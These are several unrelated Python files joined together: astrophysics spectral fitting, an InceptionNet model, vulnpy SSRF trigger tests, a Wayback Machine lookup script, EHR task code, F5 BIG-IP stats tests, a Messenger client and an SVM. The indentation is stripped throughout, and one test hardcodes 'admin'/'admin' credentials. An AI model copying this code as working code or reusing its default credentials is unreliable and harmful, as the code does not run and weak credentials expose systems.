create_plots(["dbb","po1","g1"],x_max,x_min,ymax, ymin,i)
if i == 2:
covar()
cparmins = np.array(get_covar_results().parmins)
cparmaxes = np.array(get_covar_results().parmaxes)
if (None in cparmins) == False and (None in cparmaxes) == False and (0 in cparmaxes) == False and (0 in cparmins) == False:
try:
sample_bol=sample_flux(db1+bb1,0.01,200.0, num=1000, correlated=True,confidence=68)
data_frame["total_flux"][i] = sample_bol[1][0]
data_frame["mintotal_flux"][i] = sample_bol[1][1]-sample_bol[1][0]
data_frame["maxtotal_flux"][i] = sample_bol[1][0]-sample_bol[1][2]
except:
data_frame["total_flux"][i] = 0
data_frame["mintotal_flux"][i] = 0
data_frame["maxtotal_flux"][i] = 0
create_plots(["dbb","bb1"],x_max,x_min,ymax, ymin,i)
if i == 3:
covar()
cparmins = np.array(get_covar_results().parmins)
cparmaxes = np.array(get_covar_results().parmaxes)
if (None in cparmins) == False and (None in cparmaxes) == False and (0 in cparmaxes) == False and (0 in cparmins) == False:
try:
sample_bol=sample_flux(db1+bb1+g1,0.01,200.0, num=1000, correlated=True,confidence=68)
data_frame["total_flux"][i] = sample_bol[1][0]
data_frame["mintotal_flux"][i] = sample_bol[1][1]-sample_bol[1][0]
data_frame["maxtotal_flux"][i] = sample_bol[1][0]-sample_bol[1][2]
except:
data_frame["total_flux"][i] = 0
data_frame["mintotal_flux"][i] = 0
data_frame["maxtotal_flux"][i] = 0
create_plots(["dbb","bb1","g1"],x_max,x_min,ymax, ymin,str(i))
df=pd.DataFrame.from_dict(data_frame)
df.transpose()
df.to_excel(burst_folder+source_name+'_sp_res_'+str(bid)+'_pre_pers.xlsx')
df.to_csv(burst_folder+source_name+'_sp_res_'+str(bid)+'_pre_pres.csv')
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 2 12:30:22 2021
@author: Admin
"""
import torch
import torch.nn as nn
from torchsummary import summary
class InceptionNet(nn.Module):
def __init__(self, in_channels = 3, num_classes = 1000):
super(InceptionNet, self).__init__()
self.conv1 = conv_block(in_channels = in_channels, out_channels=64, kernel_size=(7,7), stride = (2,2), padding = (3,3))
self.pool = nn.MaxPool2d(kernel_size=(3,3), stride=(2,2), padding = (1,1))
self.conv2 = conv_block(64,192, kernel_size=(3,3), stride=(1,1), padding=(1,1))
self.inception3a = Inception_block(192,64,96,128,16,32,32)
self.inception3b = Inception_block(256,128,128,192,32,96,64)
self.inception4a = Inception_block(480,192,96,208,16,48,64)
self.inception4b = Inception_block(512,160,112,224,24,64,64)
self.inception4c = Inception_block(512,128,128,256,24,64,64)
self.inception4d = Inception_block(512,112,144,288,32,64,64)
self.inception4e = Inception_block(528,256,160,320,32,128,128)
self.inception5a = Inception_block(832,256,160,320,32,128,128)
self.inception5b = Inception_block(832,384,192,384,48,128,128)
self.avgpool = nn.AvgPool2d(kernel_size=7, stride = 1)
self.dropout = nn.Dropout(0.4)
self.fc = nn.Linear(1024,1000)
def forward(self, x):
x = self.conv1(x)
x = self.pool(x)
x = self.conv2(x)
x = self.pool(x)
x = self.inception3a(x)
x = self.inception3b(x)
x = self.pool(x)
x = self.inception4a(x)
x = self.inception4b(x)
x = self.inception4c(x)
x = self.inception4d(x)
x = self.inception4e(x)
x = self.pool(x)
x = self.inception5a(x)
x = self.inception5b(x)
x = self.avgpool(x)
x = x.reshape(x.shape[0], -1)
x = self.dropout(x)
x = self.fc(x)
return x
class Inception_block(nn.Module):
def __init__(self, in_channels, out_1x1, red_3x3, out_3x3, red_5x5, out_5x5, out_1x1pool):
super(Inception_block, self).__init__()
self.branch1 = conv_block(in_channels, out_1x1, kernel_size = 1)
self.branch2 = nn.Sequential(
conv_block(in_channels, red_3x3, kernel_size=1),
conv_block(red_3x3, out_3x3, kernel_size=3, padding = 1)
)
self.branch3 = nn.Sequential(
conv_block(in_channels, red_5x5, kernel_size=1),
conv_block(red_5x5, out_5x5, kernel_size=5, padding = 2)
)
self.branch4 = nn.Sequential(
nn.MaxPool2d(kernel_size=3,stride=1, padding = 1),
conv_block(in_channels, out_1x1pool, kernel_size=1)
)
def forward(self, x):
return torch.cat([self.branch1(x), self.branch2(x), self.branch3(x), self.branch4(x)],1)
class conv_block(nn.Module):
def __init__(self, in_channels,out_channels, **kwargs):
super(conv_block,self).__init__()
self.relu = nn.ReLU()
self.conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels,**kwargs)
self.bn = nn.BatchNorm2d(out_channels)
def forward(self, x):
return self.relu(self.bn(self.conv(x)))
if __name__ == '__main__':
device = torch.device('cuda')
x = torch.randn(3,3,224,224).to(device)
model = InceptionNet().to(device)
print(model(x).shape)
print(summary(model,(3,224,224)))
|
import mock
import os
import pytest
from vulnpy.trigger import ssrf
from tests.trigger.base_test import BaseTriggerTest
class BaseSsrfTest(BaseTriggerTest):
"""All SSRF triggers catch their exceptions"""
@property
def exception_input(self):
return None
def test_exception(self):
pass
def test_exception_caught(self):
self.trigger_func(self.exception_input)
class BaseUrlopenTest(BaseSsrfTest):
@property
def good_input(self):
return "http://example.com", 200
class TestLegacyUrlopen(BaseUrlopenTest):
@property
def trigger_func(self):
return ssrf.do_legacy_urlopen
class TestUrlopenStr(BaseUrlopenTest):
@property
def trigger_func(self):
return ssrf.do_urlopen_str
class TestUrlopenObj(BaseUrlopenTest):
@property
def trigger_func(self):
return ssrf.do_urlopen_obj
class BaseHttpconnectionUrlTest(BaseSsrfTest):
@property
def good_input(self):
return ssrf.TRUSTED_URL, 200
class TestHttpconnectionRequestUrl(BaseHttpconnectionUrlTest):
@property
def trigger_func(self):
return ssrf.do_httpconnection_request_url
class TestHttpconnectionPutrequestUrl(BaseHttpconnectionUrlTest):
@property
def trigger_func(self):
return ssrf.do_httpconnection_putrequest_url
class BaseHttpconnectionMethodTest(BaseSsrfTest):
@property
def good_input(self):
return ssrf.TRUSTED_METHOD, 200
class TestHttpconnectionRequestMethod(BaseHttpconnectionMethodTest):
@property
def trigger_func(self):
return ssrf.do_httpconnection_request_method
class TestHttpconnectionPutrequestMethod(BaseHttpconnectionMethodTest):
@property
def trigger_func(self):
return ssrf.do_httpconnection_putrequest_method
class TestHttpconnectionInit(BaseSsrfTest):
@property
def good_input(self):
return ssrf.TRUSTED_HOST, 200
@property
def trigger_func(self):
return ssrf.do_httpconnection_init
# HTTPS tests raise an internal exception because we haven't figured out how
# to properly mock the socket connection without crashing python inside of
# the ssl module. These tests do still call each trigger, however, so they're
# sufficient for unit testing purposes.
class BaseHttpsconnectionUrlTest(BaseSsrfTest):
@property
def good_input(self):
return ssrf.TRUSTED_URL, ssrf.EXCEPTION_CODE
class TestHttpsconnectionRequestUrl(BaseHttpsconnectionUrlTest):
@property
def trigger_func(self):
return ssrf.do_httpsconnection_request_url
class TestHttpsconnectionPutrequestUrl(BaseHttpsconnectionUrlTest):
@property
def trigger_func(self):
return ssrf.do_httpsconnection_putrequest_url
class BaseHttpsconnectionMethodTest(BaseSsrfTest):
@property
def good_input(self):
return ssrf.TRUSTED_METHOD, ssrf.EXCEPTION_CODE
class TestHttpsconnectionRequestMethod(BaseHttpsconnectionMethodTest):
@property
def trigger_func(self):
return ssrf.do_httpsconnection_request_method
class TestHttpsconnectionPutrequestMethod(BaseHttpsconnectionMethodTest):
@property
def trigger_func(self):
return ssrf.do_httpsconnection_putrequest_method
class TestHttpsconnectionInit(BaseSsrfTest):
@property
def good_input(self):
return ssrf.TRUSTED_HOST, ssrf.EXCEPTION_CODE
@property
def trigger_func(self):
return ssrf.do_httpsconnection_init
@pytest.fixture(scope="class")
def unmock_connection():
"""
Enable a real SSRF request for just one test.
"""
with mock.patch.dict(
os.environ, {"VULNPY_REAL_SSRF_REQUESTS": "any-nonzero-value"}
):
yield
@pytest.mark.usefixtures("unmock_connection")
class TestUrlopenStrUnmocked(BaseUrlopenTest):
@property
def trigger_func(self):
return ssrf.do_urlopen_str
|
<filename>wayback.py
__author__ = "<NAME>"
__copyright__ = "Copyright 2017-2019, <NAME>"
__license__ = "apache-2.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
import re
import json
import os
import logging
import requests
import arrow
from time import sleep
import settings
logger = logging.getLogger("wayback")
logger.setLevel(10)
console_handler = logging.StreamHandler()
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s"
)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
from pprint import pprint
RE_FIRST = re.compile(
r"^\<(?P<url>[^>]+)\>; rel=\"first memento\"; datetime=\"(?P<datetime>[^\"]+).*$"
)
class FindWaybackURL(object):
def __init__(self, path, category=""):
self.path = path
self.category = category
self.epoch = int(arrow.utcnow().timestamp)
self.oldest = ""
def save_to_archiveorg(self):
urls = [
f"{settings.site.url}/{self.path}/",
f"{settings.site.url}/{self.path}/index.html",
]
for url in urls:
logger.info("saving %s to archive.org ", url)
r = requests.get(f"https://web.archive.org/save/{url}")
def possible_urls(self):
q = {}
q[f"http://{settings.site.name}/{self.path}/"] = True
q[f"http://{settings.site.name}/{self.path}/index.html"] = True
domains = settings.formerdomains + [settings.site.name]
for domain in domains:
q[f"http://{domain}/{self.path}/"] = True
categories = []
if self.category in settings.formercategories:
categories = (
categories
+ settings.formercategories[self.category]
)
for category in categories:
q[f"http://{domain}/{category}/{self.path}/"] = True
q[
f"http://{domain}/category/{category}/{self.path}/"
] = True
return list(q.keys())
def get_first_memento(self, url):
target = f"http://web.archive.org/web/timemap/link/{url}"
logger.info("requesting %s", url)
mementos = requests.get(target)
if mementos.status_code == requests.codes.ok:
if not len(mementos.text):
logger.debug("empty memento response for %s", target)
for memento in mementos.text.split("\n"):
m = RE_FIRST.match(memento)
if m:
r = settings.nameddict(
{
"epoch": int(
arrow.get(
m.group("datetime"),
"ddd, DD MMM YYYY HH:mm:ss ZZZ",
)
.to("utc")
.timestamp
),
"url": m.group("url"),
}
)
logger.info("found memento candidate: %s", r)
return r
else:
logger.debug(
"no first memento found at: %s", target
)
else:
logger.warning(
"request failed: %s, status: %s, txt: %s",
mementos,
mementos.status_code,
mementos.text,
)
def run(self):
l = self.possible_urls()
logger.info("running archive.org lookup for %s", self.path)
for url in l:
maybe = self.get_first_memento(url)
if maybe:
if maybe.epoch < self.epoch:
self.epoch = maybe.epoch
self.oldest = maybe.url
sleep(0.500)
if not len(self.oldest):
logger.error("no memento found for %s", self.path)
self.save_to_archiveorg()
else:
logger.info(
"\t\toldest found memento for %s: %s :: %s",
self.path,
str(arrow.get(self.epoch)),
self.oldest,
)
|
# coding=utf-8
# Copyright 2021 Google Health Research.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Utilities to handle EHR predictive task."""
import abc
import copy
from typing import Any, Dict, List, Mapping, Optional, Union
from ehr_prediction_modeling import mask_manager
from ehr_prediction_modeling.tasks import mlp_task_layer
from ehr_prediction_modeling.tasks import task_data
from ehr_prediction_modeling.tasks import task_layers
from ehr_prediction_modeling.tasks import task_masks
from ehr_prediction_modeling.utils import batches
from ehr_prediction_modeling.utils import mask_utils
import tensorflow.compat.v1 as tf
from ehr_prediction_modeling import configdict
class Task(metaclass=abc.ABCMeta):
"""Interface for dealing with tasks."""
task_type = ""
def __init__(self, config, label_keys=None):
self._config = config
self.mask_manager = None
self._config.eval_masks = self._update_eval_mask_names_list(
self._config.eval_masks)
self._label_keys = label_keys if label_keys else []
self._task_layer = task_layers.get_task_layer(config, self.num_targets)
self._init_mask_manager()
def _init_mask_manager(self):
self.mask_manager = mask_manager.MaskManager(
task_config=self._config,
label_keys=self._label_keys,
window_hours=self.window_hours,
supported_train_masks=self._supported_train_masks,
supported_eval_masks=self._supported_eval_masks,
)
@property
@abc.abstractmethod
def default_masks(self) -> List[str]:
"""A list of masks that are used in all this task's composite masks."""
@property
def _supported_train_masks(self) -> Dict[str, List[str]]:
return {
task_masks.Train.BASE:
self.default_masks,
}
@property
@abc.abstractmethod
def _unformatted_supported_eval_masks(self) -> Mapping[str, List[str]]:
"""Returns mapping of supported eval masks without task_type prepended..
Returns:
Map the names of masks (without task_type prepended) available during
evaluation to their components.
"""
def _update_eval_mask_names_list(self, eval_masks: List[str]) -> List[str]:
"""Updates eval mask names to include type and expand hours since event.
Args:
eval_masks: Eval masks to update the names of.
Returns:
An updated list of eval mask names. See _update_eval_mask_names Returns
for a complete description of how mask names are updated.
"""
# Convert to a dict so the same update fn can be applied to a list.
empty_values = [None] * len(eval_masks)
eval_mask_dict = dict(zip(eval_masks, empty_values))
updated_eval_masks = self._update_eval_mask_names(eval_mask_dict)
return list(updated_eval_masks)
def _update_eval_mask_names(self, eval_masks: Dict[str, Optional[List[str]]]):
"""Updates eval mask names to include type and expand hours since event.
Args:
eval_masks: Eval masks to update the names of.
Returns:
A dict of eval masks with the keys updated. Keys will have task_type added
and any mask with 'since_event_eval' in the name will be expanded based on
time_since_event_hours_list. For example, if since_event_eval mask is a
key in eval_masks and config.time_since_event_hours_list = [24, 48]. The
resulting dict will have one entry for 24 hours after event and one
entry for 48 hours after event, but no entry for the bare
since_event_eval mask. If config.time_since_event_hours_list is empty, any
since_event_eval mask will be removed.
"""
since_event_masks = [
mask_name for mask_name in eval_masks.keys()
if task_masks.Eval.SINCE_EVENT in mask_name
]
for mask_name in since_event_masks:
for hours in self._config.get("time_since_event_hours_list", []):
new_mask_name = mask_name.replace(
task_masks.Eval.SINCE_EVENT,
f"{hours}_{mask_utils.SINCE_EVENT_MASK_SUFFIX}")
eval_masks[new_mask_name] = eval_masks[mask_name]
del eval_masks[mask_name]
return {
mask_utils.get_unique_mask_name(self.task_type, mask_name): components
for mask_name, components in eval_masks.items()
}
@property
def _supported_eval_masks(self) -> Dict[str, List[str]]:
"""Returns mapping of all supported eval masks with task_type prepended.
Expands since event masks to have one entry per time_since_event_hours_list.
Returns:
Map the names of masks (with task_type prepended) available during
evaluation to their components.
"""
unformatted_eval_masks = self._unformatted_supported_eval_masks
return self._update_eval_mask_names(unformatted_eval_masks)
@property
def _all_supported_masks(self) -> Dict[str, List[str]]:
masks = copy.copy(self._supported_train_masks)
masks.update(self._supported_eval_masks)
return masks
@property
def layer(self) -> task_layers.TaskLayers:
return self._task_layer
@property
def name(self) -> str:
return self._config.name
@property
@abc.abstractmethod
def prediction_task_type(self) -> str:
"""Returns one of the values defined in {types.TaskType}."""
@abc.abstractmethod
def get_label_dicts(
self) -> Dict[str, Union[tf.FixedLenSequenceFeature, tf.FixedLenFeature]]:
"""Returns a dictionary of labels to tensors that are used for the task."""
@property
@abc.abstractmethod
def num_targets(self) -> int:
"""Total number of targets for the task."""
@property
@abc.abstractmethod
def target_names(self) -> List[str]:
"""Names of targets for the task."""
@property
@abc.abstractmethod
def window_hours(self) -> List[int]:
"""The total number of time horizons.
Note that this list possibly contains dupplicated values, e.g. with the Labs
task. It is because there are several labs with the same time horizons,
corresponding to several different targets that may have different mask
values (see mask_utils.TIME_CUTOFF_MASK).
Returns:
A list of the time horizons (in hours) of all the targets. If several
targets have the same time horizon, the values are duplicated.
"""
@abc.abstractmethod
def _get_all_task_variables(
self, batch: batches.TFBatch,
model_output: tf.Tensor) -> task_data.TaskVariables:
"""Fetches all variables used by the task."""
def _get_targets_and_masks(self,
batch: batches.TFBatch) -> tf.Tensor:
targets = self.get_targets(batch)
train_loss_mask = self.get_train_mask(batch)
eval_mask_dict = self.get_eval_mask_dict(batch)
return task_data.TaskVariables(
targets=targets,
train_mask=train_loss_mask,
eval_mask_dict=eval_mask_dict,
)
def get_task_variables(
self, batch: batches.TFBatch,
model_output: Union[tf.Tensor, None]) -> tf.Tensor:
"""Computes variables for task.
Args:
batch: Either tf.NextQueuedSequenceBatch, containing a batch of data. Or
batches.TFBatch
model_output: Either Tensor, the output from the model, shape wnt [
num_unroll, batch_size, ndim_model_output]. Or None
Returns:
task_data.TaskVariables with all the variables from this task.
"""
if model_output is not None:
return self._get_all_task_variables(batch, model_output)
else:
return self._get_targets_and_masks(batch)
def get_targets(self, batch: batches.TFBatch) -> tf.Tensor:
return self._extract_labels(batch, self._label_keys)
def get_train_mask(self, batch: batches.TFBatch) -> tf.Tensor:
"""Computes the mask to be used to mask the training loss.
Args:
batch: tf.NextQueuedSequenceBatch, containing a batch of data.
Returns:
Tensor, the loss mask to be used in training, in time-major
shape wnct [num_unroll, batch_size, channels, num_targets].
"""
train_mask = self._config.get("train_mask", task_masks.Train.BASE)
if train_mask not in self._supported_train_masks:
raise ValueError(
"Train mask {mask} is not supported".format(mask=train_mask))
return self.mask_manager.get_masks([train_mask], batch)[train_mask]
def get_eval_mask_dict(
self, batch: batches.TFBatch) -> Dict[str, tf.Tensor]:
"""Computes the dict of loss masks to be used to mask evaluation.
Args:
batch: tf.NextQueuedSequenceBatch, containing a batch of data.
Returns:
dict of string mask name to Tensors, the loss masks to be used in
evaluation, in time-major shape wnct [num_unroll, batch_size, channels,
num_targets].
"""
for eval_mask in self._config.eval_masks:
if eval_mask not in self._supported_eval_masks:
raise ValueError(
"Eval mask {mask} is not supported".format(mask=eval_mask))
return self.mask_manager.get_masks(
self._config.eval_masks,
batch,
)
@property
def loss_weight(self) -> float:
return self._config.loss_weight
@property
def eval_masks(self) -> List[str]:
return self._config.eval_masks
@property
def task_layer_sizes(self) -> List[int]:
return self._config.get("task_layer_sizes", []).copy()
def _extract_labels(self, batch: batches.TFBatch,
label_keys: List[str]) -> tf.Tensor:
"""Extracts the labels denoted by label_keys from the data.
Args:
batch: tf.NextQueuedSequenceBatch, containing a batch of data.
label_keys: list of keys used to extract labels from the batch.
Returns:
Tensor in time-major shape wnct
[num_unroll, batch_size, channels, num_targets] with the labels for each
key given in label_keys.
"""
return tf.stack(
[batch.sequences[label_key] for label_key in label_keys], axis=3)
def get_hidden_layer(self) -> mlp_task_layer.HiddenTaskLayerType:
"""Returns the underlying modeling layer from this tasks layer."""
return self.layer.get_hidden_layer()
# pytype: disable=bad-return-type
@classmethod
@abc.abstractmethod
def config(cls) -> configdict.ConfigDict:
"""Config creation for the task."""
# pytype: enable=bad-return-type
# pytype: disable=bad-return-type
@classmethod
@abc.abstractmethod
def default_configs(cls) -> List[configdict.ConfigDict]:
"""Default task config."""
# pytype: enable=bad-return-type
|
<filename>test/test_stats.py
# Copyright 2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from pytest import symbols as symbol_data
import requests
requests.packages.urllib3.disable_warnings()
from f5.bigip import ManagementRoot
from f5_openstack_agent.lbaasv2.drivers.bigip import network_helper
from f5_openstack_agent.lbaasv2.drivers.bigip import ssl_profile
from f5_openstack_agent.lbaasv2.drivers.bigip import stat_helper
from f5_openstack_agent.lbaasv2.drivers.bigip import system_helper
class TestStats:
"""
Test global stats used for calculating capacity score.
Test assumes a BIG-IP with single load balancer in an under cloud
environment using vxlan tunnels.
"""
@pytest.fixture(scope="session")
def bigip(self):
return ManagementRoot(symbol_data.bigip_ip, 'admin', 'admin')
@pytest.fixture(scope="session")
def network_helper(self):
return network_helper.NetworkHelper()
@pytest.fixture(scope="session")
def stats_helper(self):
return stat_helper.StatHelper()
@pytest.fixture(scope="session")
def system_helper(self):
return system_helper.SystemHelper()
def test_get_global_statistics(self, bigip, stats_helper):
stats = stats_helper.get_global_statistics(bigip)
assert stats
def test_get_composite_score(self, bigip, stats_helper):
score = stats_helper.get_composite_score(bigip)
assert score > 0
print "Composite Score: " + str(score)
def test_get_mem_health_score(self, bigip, stats_helper):
score = stats_helper.get_mem_health_score(bigip)
assert score > 0
print "Memory Health Score: " + str(score)
def test_get_cpu_health_score(self, bigip, stats_helper):
score = stats_helper.get_cpu_health_score(bigip)
assert score > 0
print "CPU Health Score: " + str(score)
def test_get_active_connection_count(self, bigip, stats_helper):
score = stats_helper.get_active_connection_count(bigip)
assert score >= 0
print "Active Connection Count: " + str(score)
def test_get_active_SSL_TPS(self, bigip, stats_helper):
score = stats_helper.get_active_SSL_TPS(bigip)
assert score >= 0
print "Active SSL TPS: " + str(score)
def test_get_inbound_throughput(self, bigip, stats_helper):
score = stats_helper.get_inbound_throughput(bigip)
assert score > 0
print "Inbound Throughtput: " + str(score)
def test_get_outbound_throughput(self, bigip, stats_helper):
score = stats_helper.get_outbound_throughput(bigip)
assert score > 0
print "Outbound Throughtput: " + str(score)
def test_get_throughput(self, bigip, stats_helper):
score = stats_helper.get_throughput(bigip)
assert score >= 0
print "Throughput: " + str(score)
def test_get_node_count(self, bigip):
count = len(bigip.tm.ltm.nodes.get_collection())
assert count == 1
print "Node Count: " + str(count)
def test_get_clientssl_profile_count(self, bigip):
count = ssl_profile.SSLProfileHelper.get_client_ssl_profile_count(bigip)
assert count > 0
print "SSL Profile Count: " + str(count)
def test_get_tenant_count(self, bigip, system_helper):
count = system_helper.get_tenant_folder_count(bigip)
assert count == 1
print "Tenant Count: " + str(count)
def test_get_tunnel_count(self, bigip, network_helper):
count = network_helper.get_tunnel_count(bigip)
assert count == 1
print "Tunnel Count: " + str(count)
def test_get_vlan_count(self, bigip, network_helper):
count = network_helper.get_vlan_count(bigip)
assert count == 2
print "VLAN Count: " + str(count)
def test_get_route_domain_count(self, bigip, network_helper):
count = network_helper.get_route_domain_count(bigip)
assert count == 1
print "Route Domain Count: " + str(count)
|
import asyncio
import warnings
import re
import aiohttp
from .handler import FacebookHandler
from .types.send_api import Payload, Recipient, Message, Attachment, PersistentMenu
from .types.templates import Template
class MessengerWarning(UserWarning):
""""""
class Messenger(object):
def __init__(self, page_access_token, verify_token, urlpath="", **kwargs):
self.handler = FacebookHandler(page_access_token, verify_token, **kwargs)
self.page_access_token = page_access_token
self.urlpath = urlpath
self.api_ver = kwargs.pop('api_ver', 'v3.3')
def _get_url(self, suffix):
return f"https://graph.facebook.com/{self.api_ver}/{suffix}"
@staticmethod
async def _api_call_post(url, data):
async with aiohttp.ClientSession() as session:
headers = {'Content-type': 'application/json'}
async with session.post(url=url,
data=data,
headers=headers) as response:
response = await response.json()
if response.get('error'):
warnings.warn(f"POST request to "
f"\"{re.sub('[?]access_token=[A-Za-z0-9]+', '', url)}\""
f" returns error: {response['error']}",
MessengerWarning)
return response
@staticmethod
async def _api_call_get(url, params):
async with aiohttp.ClientSession() as session:
headers = {'Content-type': 'application/json'}
async with session.get(url=url,
params=params,
headers=headers) as response:
response = await response.json()
if response.get('error'):
warnings.warn(f"GET request to "
f"\"{re.sub('[?]access_token=[A-Za-z0-9]+', '', url)}\""
f" returns error: {response['error']}",
MessengerWarning)
return response
async def get_user_profile(self, psid, fields=("first_name", "last_name")):
"""
:param psid:
:param fields:
:return:
"""
params = {"fields": f"{','.join(fields)}", "access_token": self.page_access_token}
response = await self._api_call_get(self._get_url(f"{psid}"), params)
return response
async def get_page_info(self):
"""
:return:
"""
params = {"access_token": self.page_access_token}
response = await self._api_call_get(self._get_url(f"me"), params)
return response
async def send(self, recipient_id, message, quick_replies=None,
messaging_type=None, metadata=None, notification_type=None,
tag=None):
"""
:param recipient_id:
:param message:
:param quick_replies:
:param messaging_type:
:param metadata:
:param notification_type:
:param tag:
:return:
"""
if not isinstance(message, str) and not isinstance(message, Template):
raise ValueError(f"Message must be str or Template, got {type(message)}")
text = message if isinstance(message, str) else None
attachment = Attachment("template", message) if not text else None
data = Payload(recipient=Recipient(id_=recipient_id),
message=Message(text=text,
attachment=attachment,
quick_replies=quick_replies,
metadata=metadata),
messaging_type=messaging_type,
notification_type=notification_type,
tag=tag).to_json()
await self._api_call_post(self._get_url(f"me/messages?access_token"
f"={self.page_access_token}"), data)
async def set_persistent_menu(self, persistent_menu):
"""
:param persistent_menu:
:return:
"""
raise NotImplementedError
async def typing_on(self, recipient_id):
"""
:param recipient_id:
:return:
"""
data = Payload(recipient=Recipient(id_=recipient_id),
messaging_type=None,
message=None,
sender_action="typing_on").to_json()
await self._api_call_post(self._get_url(f"me/messages?access_token"
f"={self.page_access_token}"), data)
async def typing_off(self, recipient_id):
"""
:param recipient_id:
:return:
"""
data = Payload(recipient=Recipient(id_=recipient_id),
messaging_type=None,
message=None,
sender_action="typing_off").to_json()
await self._api_call_post(self._get_url(f"me/messages?access_token"
f"={self.page_access_token}"), data)
async def mark_seen(self, recipient_id):
"""
:param recipient_id:
:return:
"""
data = Payload(recipient=Recipient(id_=recipient_id),
messaging_type=None,
message=None,
sender_action="mark_seen").to_json()
await self._api_call_post(self._get_url(f"me/messages?access_token"
f"={self.page_access_token}"), data)
def imitate_typing(self, time_to_sleep=0):
"""
:param time_to_sleep:
:return:
"""
def decorator(func):
async def wrapper(event, *args, **kwargs):
await self.mark_seen(event.sender_id)
await self.typing_on(event.sender_id)
await asyncio.sleep(time_to_sleep)
await func(event, *args, **kwargs)
await self.typing_off(event.sender_id)
return wrapper
return decorator
|
<filename>ad_examples/classifier/svm.py
import numpy.random as rnd
from ..common.utils import *
from ..common.gen_samples import *
from ..common.sgd_optimization import sgdRMSProp
"""
Simple SVM implementations in primal form, solved with only gradient descent
and no other linear optimization libraries.
"""
class Classifier(object):
def __init__(self, C=1.):
self.C = C
self.w_ = None
self.b_ = None
self.cls2index_ = None
self.index2cls_ = None
self.w_names = None
def set_classes(self, y):
c_ = np.unique(y)
self.cls2index_ = dict()
self.index2cls_ = dict()
for i, v in enumerate(c_):
self.cls2index_[v] = i
self.index2cls_[i] = v
def fit(self, x, y):
pass
def decision_function(self, x):
return x.dot(self.w_) + self.b_
def predict(self, x):
pass
class BinaryLinearSVMClassifier(Classifier):
"""A very simple binary SVM classifier trained using gradient descent
Note: The optimization solves the objective in primal
"""
def __init__(self, C=1.):
Classifier.__init__(self, C)
def f(self, Wb, x, y):
"""Loss function
hinge_loss(x) = max(0, x)
loss = 0.5 * w.w / C
+ hinge_loss(1 - 1[y == 1] * (x.w + b))
+ hinge_loss(1 + 1[y == 0] * (x.w + b))
"""
w = Wb[0:(len(Wb)-1)]
b = Wb[len(Wb)-1]
loss_r = 0.5 * w.dot(w) / self.C
y_ = np.array([1. if yy == 1 else -1. for yy in y])
e_ = 1. - y_ * (x.dot(w) + b)
loss_h = np.mean(np.maximum(e_, 0.))
return loss_r + loss_h
def g(self, Wb, x, y):
"""Gradient of loss function
d_loss = w / C
+ 1[1 - 1[y == 1] * (x.w + b) > 0] * (-1) * 1[y == 1] * x
+ 1[1 + 1[y == 0] * (x.w + b) > 0] * ( 1) * 1[y == 0] * x
"""
w = Wb[0:(len(Wb)-1)]
b = Wb[len(Wb)-1]
y_ = np.array([1 if yy == 1 else -1 for yy in y])
e_ = 1. - y_ * (x.dot(w) + b)
egz = e_ > 0
a1 = np.transpose([np.logical_and(egz, y_ == 1.).astype(int)])
a2 = np.transpose([np.logical_and(egz, y_ == -1.).astype(int)])
dlossW = np.mean(np.multiply(a1, -x) + np.multiply(a2, x), axis=0)
dlossb = np.mean(np.multiply(a1, -1) + np.multiply(a2, 1.))
return np.append(w / self.C, [0.]) + np.append(dlossW, dlossb)
def fit(self, x, y):
def wf(w, x, y):
return self.f(w, x, y)
def wg(w, x, y):
return self.g(w, x, y)
self.w_ = None
self.b_ = None
self.set_classes(y)
y_ = np.array([self.cls2index_[v] for v in y])
w0 = np.zeros(x.shape[1], dtype=float)
b0 = 0.
Wb0 = np.append(w0, [b0])
Wb = sgdRMSProp(Wb0, x, y_, wf, wg, learning_rate=0.001, max_epochs=15000)
self.w_ = Wb[0:(len(Wb) - 1)]
self.b_ = Wb[len(Wb) - 1]
return self.w_, self.b_
def predict(self, x):
des = self.decision_function(x)
# logger.debug("decision_function:\n%s" % str(des))
pred_y = np.sign(des)
y = np.array([self.index2cls_[0] if k == -1 else self.index2cls_[1] for k in pred_y])
return y
class MultiClassLinearSVMClassifier(Classifier):
"""A very simple multi-class SVM classifier trained using gradient descent.
We solve the classification problem simultaneously for all classes instead
of treating the task as multiple independent binary classification tasks.
Define m as the predicted class for x:
m = argmax_{k=1..M} x.w_k + b_k
The objective is:
minimize_w 0.5 * w.w + C * hinge_loss(2 + x.w_m + b_m - x.w_y - b_y)
Note: The optimization solves the objective in primal.
"""
def __init__(self, C=1., penalty_type='L1', penalize_bias=False):
Classifier.__init__(self, C)
if not (penalty_type == 'L1' or penalty_type == 'L2'):
raise ValueError("Invalid penalty type.")
self.penalty_type = penalty_type # 'L1'/'L2'
self.penalize_bias = penalize_bias
def f(self, Wb, x, y):
"""Loss function
hinge_loss(x) = max(0, x)
Define m as the predicted class for x:
m = argmax_{k=1..M} x.w_k + b_k
loss = 0.5 * w.w / C
+ hinge_loss(2 + x.w_m + b_m - x.w_y + b_y)^p
where p = 1 or 2 depending on penalty_type
Args:
Wb: np.array(size=(M x (d+1),))
Where M is the number of classes, d is the data dimension,
includes one bias for each class. The weight vectors for all
classes are concatenated one after the other to form a 1d array.
"""
n = x.shape[0]
d = x.shape[1]
M = len(Wb) / (d+1) # The d plus one for bias term
Wb_ = np.reshape(Wb, (M, d+1), order='C')
# logger.debug("Wb_:\n%s" % str(Wb_))
wT = Wb_[:, 0:d]
b = Wb_[:, d]
w = np.transpose(wT) # weights are column vectors
pv = x.dot(w) + b
py = np.argmax(pv, axis=1)
# logger.debug("pv:\n%s" % str(pv))
